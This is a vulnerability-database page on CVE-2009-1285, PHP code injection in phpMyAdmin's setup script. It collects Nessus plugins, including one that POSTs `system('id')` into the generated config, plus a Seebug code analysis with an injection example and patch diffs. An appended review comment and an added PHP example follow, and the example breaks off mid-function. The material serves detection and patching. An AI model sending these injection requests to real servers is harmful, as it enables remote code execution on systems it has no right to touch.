Vulnerabilities > CVE-2009-1285 - Code Injection vulnerability in PHPmyadmin
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: PARTIAL
Integrity impact: PARTIAL
Availability impact: PARTIAL
Summary
Static code injection vulnerability in the getConfigFile function in setup/lib/ConfigFile.class.php in phpMyAdmin 3.x before 3.1.3.2 allows remote attackers to inject arbitrary PHP code into configuration files.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | | 12 |
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Leverage Executable Code in Non-Executable Files: An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file), the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated, mashing up resources from local and remote sources, the possibility of this attack occurring is high. The attack can be directed at a client system, such as causing a buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser. Another example targets clients reading PDF files. In this case the attacker simply appends JavaScript to the end of a legitimate URL for a PDF (http://www.gnucitizen.org/blog/danger-danger-danger/): http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here. The client assumes that they are reading a PDF, but the attacker has modified the resource and loaded executable JavaScript into the client's browser process. The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server; adding the role name "public" grants all users with the public role the ability to use the administration functionality. The server trusts its configuration file to be correct, but when it is manipulated, the attacker gains full control.
- Manipulating User-Controlled Variables: This attack targets user-controlled variables (DEBUG=1, PHP Globals, and so forth). An attacker can override environment variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the attacker can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.
Nessus
- NASL family: Fedora Local Security Checks
- NASL id: FEDORA_2009-3700.NASL
- description: Improvements for 3.1.3.2: - [security] Insufficient output sanitizing when generating configuration file http://www.phpmyadmin.net/home_page/security/PMASA-2009-4.php Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
- last seen: 2020-06-01
- modified: 2020-06-02
- plugin id: 36312
- published: 2009-04-23
- reporter: This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
- source: https://www.tenable.com/plugins/nessus/36312
- title: Fedora 10 : phpMyAdmin-3.1.3.2-1.fc10 (2009-3700)
- code:

```nasl
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Fedora Security Advisory 2009-3700.
#

include("compat.inc");

if (description)
{
  script_id(36312);
  script_version ("1.14");
  script_cvs_date("Date: 2019/08/02 13:32:29");

  script_cve_id("CVE-2009-1285");
  script_bugtraq_id(34526);
  script_xref(name:"FEDORA", value:"2009-3700");
  script_xref(name:"TRA", value:"TRA-2009-02");

  script_name(english:"Fedora 10 : phpMyAdmin-3.1.3.2-1.fc10 (2009-3700)");
  script_summary(english:"Checks rpm output for the updated package.");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Fedora host is missing a security update."
  );
  script_set_attribute(
    attribute:"description",
    value:
"Improvements for 3.1.3.2:

  - [security] Insufficient output sanitizing when generating
    configuration file
    http://www.phpmyadmin.net/home_page/security/PMASA-2009-4.php

Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
  );
  # http://www.phpmyadmin.net/home_page/security/PMASA-2009-4.php
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.phpmyadmin.net/security/PMASA-2009-4/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.redhat.com/show_bug.cgi?id=495768"
  );
  # https://lists.fedoraproject.org/pipermail/package-announce/2009-April/022398.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?92439f35"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.tenable.com/security/research/tra-2009-02"
  );
  script_set_attribute(
    attribute:"solution",
    value:"Update the affected phpMyAdmin package."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_cwe_id(94);

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:phpMyAdmin");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:10");

  script_set_attribute(attribute:"patch_publication_date", value:"2009/04/15");
  script_set_attribute(attribute:"plugin_publication_date", value:"2009/04/23");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Fedora Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("rpm.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = os_ver[1];
if (! ereg(pattern:"^10([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 10.x", "Fedora " + os_ver);

if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);

flag = 0;
if (rpm_check(release:"FC10", reference:"phpMyAdmin-3.1.3.2-1.fc10")) flag++;


if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "phpMyAdmin");
}
```
- NASL family: CGI abuses
- NASL id: PHPMYADMIN_PMASA_2009_4.NASL
- description: The setup script included with the version of phpMyAdmin installed on the remote host does not properly sanitize user-supplied input before using it to generate a config file for the application. This version is affected by the following vulnerabilities : - The setup script inserts the unsanitized verbose server name into a C-style comment during config file generation. - An attacker can save arbitrary data to the generated config file by altering the value of the
- last seen: 2020-06-01
- modified: 2020-06-02
- plugin id: 36171
- published: 2009-04-16
- reporter: This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.
- source: https://www.tenable.com/plugins/nessus/36171
- title: phpMyAdmin Setup Script Configuration Parameters Arbitrary PHP Code Injection (PMASA-2009-4)
- code:

```nasl
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(36171);
  script_version("1.16");
  script_cvs_date("Date: 2018/07/24 18:56:11");

  script_cve_id("CVE-2009-1285");
  script_bugtraq_id(34526);
  script_xref(name:"TRA", value:"TRA-2009-02");
  script_xref(name:"Secunia", value:"34727");

  script_name(english:"phpMyAdmin Setup Script Configuration Parameters Arbitrary PHP Code Injection (PMASA-2009-4)");
  script_summary(english:"Attempts to inject PHP code into config file.");

  script_set_attribute(
    attribute:"synopsis",
    value:
"The remote web server contains a PHP application that is affected by a
code execution vulnerability."
  );
  script_set_attribute(
    attribute:"description",
    value:
"The setup script included with the version of phpMyAdmin installed on
the remote host does not properly sanitize user-supplied input before
using it to generate a config file for the application. This version is
affected by the following vulnerabilities :

  - The setup script inserts the unsanitized verbose server
    name into a C-style comment during config file generation.

  - An attacker can save arbitrary data to the generated config
    file by altering the value of the 'textconfig' parameter
    during a POST request to config.php.

An unauthenticated, remote attacker can exploit these issues to execute
arbitrary PHP code."
  );
  script_set_attribute(attribute:"see_also", value:"https://www.tenable.com/security/research/tra-2009-02");
  script_set_attribute(attribute:"see_also", value:"http://www.phpmyadmin.net/home_page/security/PMASA-2009-4.php");
  script_set_attribute(
    attribute:"solution",
    value:
"Upgrade to phpMyAdmin 3.1.3.2. Alternatively, apply the patches
referenced in the project's advisory."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_cwe_id(94);

  script_set_attribute(attribute:"plugin_publication_date", value: "2009/04/16");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:phpmyadmin:phpmyadmin");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");
  script_copyright(english:"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.");

  script_dependencies("phpMyAdmin_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/phpMyAdmin", "www/PHP");

  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80, embedded:FALSE, php:TRUE);

# Test an install.
install = get_kb_item(string("www/", port, "/phpMyAdmin"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (isnull(matches)) exit(0);
pma_dir = matches[2];

injected_code = "system('id');";
eoltype = "unix";

function get_token()
{
  local_var dir, token, url, res, pat, match, item;

  dir = _FCT_ANON_ARGS[0];
  token = NULL;
  if (isnull(dir)) return NULL;

  url = string(dir, "/setup/index.php");
  clear_cookiejar();
  res = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail:TRUE);

  # Extract the token.
  token = NULL;
  pat = 'input type="hidden" name="token" value="([^"]+)"';
  matches = egrep(string:res[2], pattern:pat);
  if (matches)
  {
    foreach match (split(matches, keep:FALSE))
    {
      item = eregmatch(pattern:pat, string:match);
      if (!isnull(item))
      {
        token = item[1];
        break;
      }
    }
  }
  return token;
}

# Try the first exploit (manipulating the textconfig parameter)
token = get_token(pma_dir);
if (isnull(token)) exit(0);

postdata = string(
  "check_page_refresh=1&",
  "convcharset=utf-8&",
  "token=", token, "&",
  "eoltype=", eoltype, "&",
  "textconfig=", injected_code, "&",
  "submit_download=Download"
);
url = string(pma_dir, "/setup/config.php?type=post");
req = http_mk_post_req(
  port        : port,
  item        : url,
  data        : postdata,
  add_headers : make_array(
    "Content-Type", "application/x-www-form-urlencoded"
  )
);
res = http_send_recv_req(port:port, req:req, exit_on_fail:TRUE);

if (res[2] == injected_code)
{
  security_hole(port);
  exit(0);
}

# If that exploit didn't work, try using the comment injection exploit
token = get_token(pma_dir);
if (isnull(token)) exit(0);

# First, get the "add a new server" form...
url = string(
  pma_dir, "/setup/index.php?",
  "check_page_refresh=&",
  "lang=en-utf-8&",
  "convcharset=utf-8&",
  "token=", token, "&",
  "page=servers&",
  "mode=add&",
  "submit=New+server"
);
res = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail:TRUE);

# ...then submit all the new server info, including the injection attack...
postdata = string(
  "check_page_refresh=&",
  "convcharset=utf-8&",
  "token=", token, "&",
  "page=servers&",
  "mode=add&",
  "submit=New+server&",
  "UploadDir=/tmp&",
  "Servers-0-verbose=*/", injected_code, "/*&Servers-0-host=Nessus&Servers-0-port=&Servers-0-socket=&Servers-0-connect_type=tcp&Servers-0-extension=mysqli&Servers-0-auth_type=cookie&Servers-0-user=root&Servers-0-password=&Servers-0-auth_swekey_config=&Servers-0-SignonSession=&Servers-0-SignonURL=&Servers-0-LogoutURL=&Servers-0-only_db=&Servers-0-hide_db=&Servers-0-AllowRoot=on&Servers-0-DisableIS=on&Servers-0-AllowDeny-order=&Servers-0-AllowDeny-rules=&Servers-0-ShowDatabasesCommand=SHOW+DATABASES&Servers-0-CountTables=on&Servers-0-pmadb=&Servers-0-controluser=&Servers-0-controlpass=&Servers-0-verbose_check=on&Servers-0-bookmarktable=&Servers-0-relation=&Servers-0-table_info=&Servers-0-table_coords=&Servers-0-pdf_pages=&Servers-0-column_info=&Servers-0-history=&Servers-0-designer_coords=&submit_save=Save"
);
req = http_mk_post_req(
  port        : port,
  item        : url,
  data        : postdata,
  add_headers : make_array(
    "Content-Type", "application/x-www-form-urlencoded"
  )
);
res = http_send_recv_req(port:port, req:req, exit_on_fail:TRUE);

# ...and check if the injection worked
postdata = string(
  "convcharset=utf-8&",
  "token=", token, "&",
  "server[password]=&",
  "DefaultLang=es&",
  "ServerDefault=1&",
  "eol=", eoltype, "&",
  "submit_display=Display"
);
url2 = string(pma_dir, "/setup/index.php?page=config");
req = http_mk_post_req(
  port        : port,
  item        : url2,
  data        : postdata,
  add_headers : make_array(
    "Content-Type", "application/x-www-form-urlencoded"
  )
);
res = http_send_recv_req(port:port, req:req, exit_on_fail:TRUE);

expected_output = '/* Server: */' + injected_code + '/* [1] */';
if (expected_output >< res[2])
{
  security_hole(port);
}
```
- NASL family: FreeBSD Local Security Checks
- NASL id: FREEBSD_PKG_1A0E4CC629BF11DEBDEB0030843D3802.NASL
- description: phpMyAdmin Team reports : Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. This issue is on different parameters than PMASA-2009-3 and it was missed out of our radar because it was not existing in 2.11.x branch.
- last seen: 2020-06-01
- modified: 2020-06-02
- plugin id: 36167
- published: 2009-04-16
- reporter: This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
- source: https://www.tenable.com/plugins/nessus/36167
- title: FreeBSD : phpmyadmin -- insufficient output sanitizing when generating configuration file (1a0e4cc6-29bf-11de-bdeb-0030843d3802)
- code:

```nasl
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from the FreeBSD VuXML database :
#
# Copyright 2003-2019 Jacques Vidrine and contributors
#
# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,
# HTML, PDF, PostScript, RTF and so forth) with or without modification,
# are permitted provided that the following conditions are met:
# 1. Redistributions of source code (VuXML) must retain the above
#    copyright notice, this list of conditions and the following
#    disclaimer as the first lines of this file unmodified.
# 2. Redistributions in compiled form (transformed to other DTDs,
#    published online in any format, converted to PDF, PostScript,
#    RTF and other formats) must reproduce the above copyright
#    notice, this list of conditions and the following disclaimer
#    in the documentation and/or other materials provided with the
#    distribution.
#
# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#

include("compat.inc");

if (description)
{
  script_id(36167);
  script_version("1.16");
  script_cvs_date("Date: 2019/08/02 13:32:39");

  script_cve_id("CVE-2009-1285");
  script_xref(name:"TRA", value:"TRA-2009-02");

  script_name(english:"FreeBSD : phpmyadmin -- insufficient output sanitizing when generating configuration file (1a0e4cc6-29bf-11de-bdeb-0030843d3802)");
  script_summary(english:"Checks for updated package in pkg_info output");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote FreeBSD host is missing a security-related update."
  );
  script_set_attribute(
    attribute:"description",
    value:
"phpMyAdmin Team reports :

Setup script used to generate configuration can be fooled using a
crafted POST request to include arbitrary PHP code in generated
configuration file. Combined with ability to save files on server,
this can allow unauthenticated users to execute arbitrary PHP code.

This issue is on different parameters than PMASA-2009-3 and it was
missed out of our radar because it was not existing in 2.11.x branch."
  );
  # http://www.phpmyadmin.net/home_page/security/PMASA-2009-4.php
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.phpmyadmin.net/security/PMASA-2009-4/"
  );
  # https://vuxml.freebsd.org/freebsd/1a0e4cc6-29bf-11de-bdeb-0030843d3802.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?79a83fcc"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.tenable.com/security/research/tra-2009-02"
  );
  script_set_attribute(attribute:"solution", value:"Update the affected package.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_cwe_id(94);

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:phpMyAdmin");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd");

  script_set_attribute(attribute:"vuln_publication_date", value:"2009/04/14");
  script_set_attribute(attribute:"patch_publication_date", value:"2009/04/15");
  script_set_attribute(attribute:"plugin_publication_date", value:"2009/04/16");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"FreeBSD Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info");

  exit(0);
}


include("audit.inc");
include("freebsd_package.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/FreeBSD/release")) audit(AUDIT_OS_NOT, "FreeBSD");
if (!get_kb_item("Host/FreeBSD/pkg_info")) audit(AUDIT_PACKAGE_LIST_MISSING);


flag = 0;

if (pkg_test(save_report:TRUE, pkg:"phpMyAdmin<3.1.3.2")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");
```
- NASL family: Fedora Local Security Checks
- NASL id: FEDORA_2009-3692.NASL
- description: Improvements for 3.1.3.2: - [security] Insufficient output sanitizing when generating configuration file http://www.phpmyadmin.net/home_page/security/PMASA-2009-4.php Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
- last seen: 2020-06-01
- modified: 2020-06-02
- plugin id: 36165
- published: 2009-04-16
- reporter: This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
- source: https://www.tenable.com/plugins/nessus/36165
- title: Fedora 9 : phpMyAdmin-3.1.3.2-1.fc9 (2009-3692)
- code:

```nasl
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Fedora Security Advisory 2009-3692.
#

include("compat.inc");

if (description)
{
  script_id(36165);
  script_version ("1.15");
  script_cvs_date("Date: 2019/08/02 13:32:29");

  script_cve_id("CVE-2009-1285");
  script_bugtraq_id(34526);
  script_xref(name:"FEDORA", value:"2009-3692");
  script_xref(name:"TRA", value:"TRA-2009-02");

  script_name(english:"Fedora 9 : phpMyAdmin-3.1.3.2-1.fc9 (2009-3692)");
  script_summary(english:"Checks rpm output for the updated package.");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Fedora host is missing a security update."
  );
  script_set_attribute(
    attribute:"description",
    value:
"Improvements for 3.1.3.2:

  - [security] Insufficient output sanitizing when generating
    configuration file
    http://www.phpmyadmin.net/home_page/security/PMASA-2009-4.php

Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
  );
  # http://www.phpmyadmin.net/home_page/security/PMASA-2009-4.php
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.phpmyadmin.net/security/PMASA-2009-4/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.redhat.com/show_bug.cgi?id=495768"
  );
  # https://lists.fedoraproject.org/pipermail/package-announce/2009-April/022388.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?f6918e30"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.tenable.com/security/research/tra-2009-02"
  );
  script_set_attribute(
    attribute:"solution",
    value:"Update the affected phpMyAdmin package."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_cwe_id(94);

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:phpMyAdmin");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:9");

  script_set_attribute(attribute:"patch_publication_date", value:"2009/04/15");
  script_set_attribute(attribute:"plugin_publication_date", value:"2009/04/16");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Fedora Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("rpm.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = os_ver[1];
if (! ereg(pattern:"^9([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 9.x", "Fedora " + os_ver);

if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);

flag = 0;
if (rpm_check(release:"FC9", reference:"phpMyAdmin-3.1.3.2-1.fc9")) flag++;


if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "phpMyAdmin");
}
```
Seebug
- bulletinFamily: exploit
- description:

Well, I usually don't blog about these bugs but phpMyAdmin is a project that is used almost everywhere and this is a quick and dirty way to get code execution. This issue affects phpMyAdmin 3.x before 3.1.3.2 and it was disclosed on 14 April 2009. The bug is present in the setup/lib/ConfigFile.class.php file. Here is an outline of that file from the 3.1.3.1 release:

```php
1   <?php
...
10  class ConfigFile
11  {
12      /**
13       * Stores default PMA config from config.default.php
14       * @var array
15       */
16      private $cfg;
...
259     /**
260      * Creates config file
261      *
262      * @return string
263      */
264     public function getConfigFile()
265     {
266         $crlf = (isset($_SESSION['eol']) && $_SESSION['eol'] == 'win') ? "\r\n" : "\n";
267         $c = $_SESSION['ConfigFile'];
268
269         // header
270         $ret = '<?php' . $crlf
...
279         // servers
280         if ($this->getServerCount() > 0) {
281             $ret .= "/* Servers configuration */$crlf\$i = 0;" . $crlf . $crlf;
282             foreach ($c['Servers'] as $id => $server) {
283                 $ret .= '/* Server: ' . $this->getServerName($id) . " [$id] */" . $crlf
284                     . '$i++;' . $crlf;
285                 foreach ($server as $k => $v) {
286                     $ret .= "\$cfg['Servers'][\$i]['$k'] = "
287                         . var_export($v, true) . ';' . $crlf;
288                 }
289                 $ret .= $crlf;
290             }
291             $ret .= '/* End of servers configuration */' . $crlf . $crlf;
292         }
...
```

So… function getConfigFile() retrieves various information. Here it constructs a configuration file and $ret includes the PHP code. At line 281 it starts the file with the comment:

```php
/* Servers configuration */
```

Then, as you can clearly see at line 283, the configuration will have a new comment which is:

```php
/* Server: <getServerName()> "id" */
```

However, $id is completely user controlled since it's derived from the session variable ConfigFile at line 267. For example, if a user specifies an $id of:

```
bleh */ <?php echo date(); ?> /*
```

he will end up with a configuration file that includes this:

```php
/* Server: <getServerName()> bleh */ <?php echo date(); ?> /* */
```

This simple code injection was patched by limiting the user input using the preg_replace() function like this:

```diff
 foreach ($c['Servers'] as $id => $server) {
+    $k = preg_replace('/[^A-Za-z0-9_]/', '_', $k);
     $ret .= '/* Server: ' . $this->getServerName($id) . " [$id] */" . $crlf
```

Which replaces any matches of /[^A-Za-z0-9_]/ with _ and moves on with the next element. The same bug was also in the following code of the same function:

```php
296     // other settings
297     $persistKeys = $this->persistKeys;
298     foreach ($c as $k => $v) {
299         $ret .= "\$cfg['$k'] = " . var_export($v, true) . ';' . $crlf;
300         if (isset($persistKeys[$k])) {
301             unset($persistKeys[$k]);
302         }
303     }
```

Where the exact same logic applies and also the same patch :-P

```diff
 foreach ($c as $k => $v) {
+    $k = preg_replace('/[^A-Za-z0-9_]/', '_', $k);
     $ret .= "\$cfg['$k'] = " . var_export($v, true) . ';' . $crlf;
```

There was another instance of that bug at the last loop of that function, which was this:

```php
305     // keep 1d array keys which are present in $persist_keys (config_info.inc.php)
306     foreach (array_keys($persistKeys) as $k) {
307         if (strpos($k, '/') === false) {
308             $ret .= "\$cfg['$k'] = " . var_export($this->getDefault($k), true) . ';' . $crlf;
309         }
310     }
311     $ret .= '?>';
312
313     return $ret;
314 }
315 }
316 ?>
```

Again, the concept is the same in the foreach() loop at line 306 and the patch was of course:

```diff
 if (strpos($k, '/') === false) {
+    $k = preg_replace('/[^A-Za-z0-9_]/', '_', $k);
     $ret .= "\$cfg['$k'] = " . var_export($this->getDefault($k), true) . ';' . $crlf;
```

The evil auditors among us would have caught that the bug is still there ;-)

- phpMyAdmin 3.1.3.2
- None available
- http://www.phpmyadmin.net/home_page/security/PMASA-2009-4.php
- http://www.phpmyadmin.net/home_page/index.php
- id: SSV:5112
- last seen: 2017-11-19
- modified: 2009-04-25
- published: 2009-04-25
- reporter: Root
- title: CVE-2009-1285: phpMyAdmin Code Injection

- bulletinFamily: exploit
- description:

BUGTRAQ ID: 34526
CVE(CAN) ID: CVE-2009-1285

phpMyAdmin is a tool written in PHP for administering MySQL over the web.

The setup script used by phpMyAdmin does not properly filter configuration parameters. If a remote attacker submits a malicious POST request to the server, arbitrary PHP code can be injected into the generated configuration file.

phpMyAdmin phpMyAdmin 3.x
phpMyAdmin phpMyAdmin 2.11.x
phpMyAdmin
----------
The vendor has already released an upgrade patch to fix this security issue; please download it from the vendor's home page:
http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin?view=rev&revision=12342
http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin?view=rev&revision=12348

- id: SSV:5058
- last seen: 2017-11-19
- modified: 2009-04-16
- published: 2009-04-16
- reporter: Root
- title: phpMyAdmin Configuration File PHP Code Injection Vulnerability
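Review bot: in the first patch fragment of the SSV:5112 post above (the `foreach ($c['Servers'] as $id => $server)` loop), the added line `$k = preg_replace('/[^A-Za-z0-9_]/', '_', $k);` filters `$k`, but the line it is meant to protect interpolates `$id` (`" [$id] */"`) and the result of `$this->getServerName($id)`, neither of which is touched, so the comment can still be closed early from those values; the same `preg_replace()` should be applied to `$id` before it is used, and the server name emitted from `getServerName()` needs the same treatment or must not be placed inside a comment at all. The two later fragments filter the variable they actually interpolate (`$k`), so they are fine as shown.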
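The defect and its fix, as discussed in the SSV:5112 post above, reduced to a runnable model. This is an added example, not phpMyAdmin's code: `buildServersBlock()` imitates the servers loop of `getConfigFile()`, once in its vulnerable shape and once with the whitelist regex from the fix applied to the server id, the verbose name and every option key; `countComments()` is an added structural check that tokenizes the generated text and verifies that the comment layout the generator intended survived. Function names, the hostile server id and the server array are constructed for the demonstration; PHP 7.4 or later is assumed.

```php
<?php
// Added example, not phpMyAdmin's code: a cut-down model of the getConfigFile()
// servers loop analysed in the post above, built once in the vulnerable shape and
// once with the whitelist sanitiser applied to every string that is interpolated
// into a comment or a quoted array key. Function names and inputs are constructed
// for this demonstration; requires PHP 7.4 or later.

declare(strict_types=1);

/** The regex from the phpMyAdmin fix: anything outside [A-Za-z0-9_] becomes '_'. */
function sanitizeIdentifier(string $s): string
{
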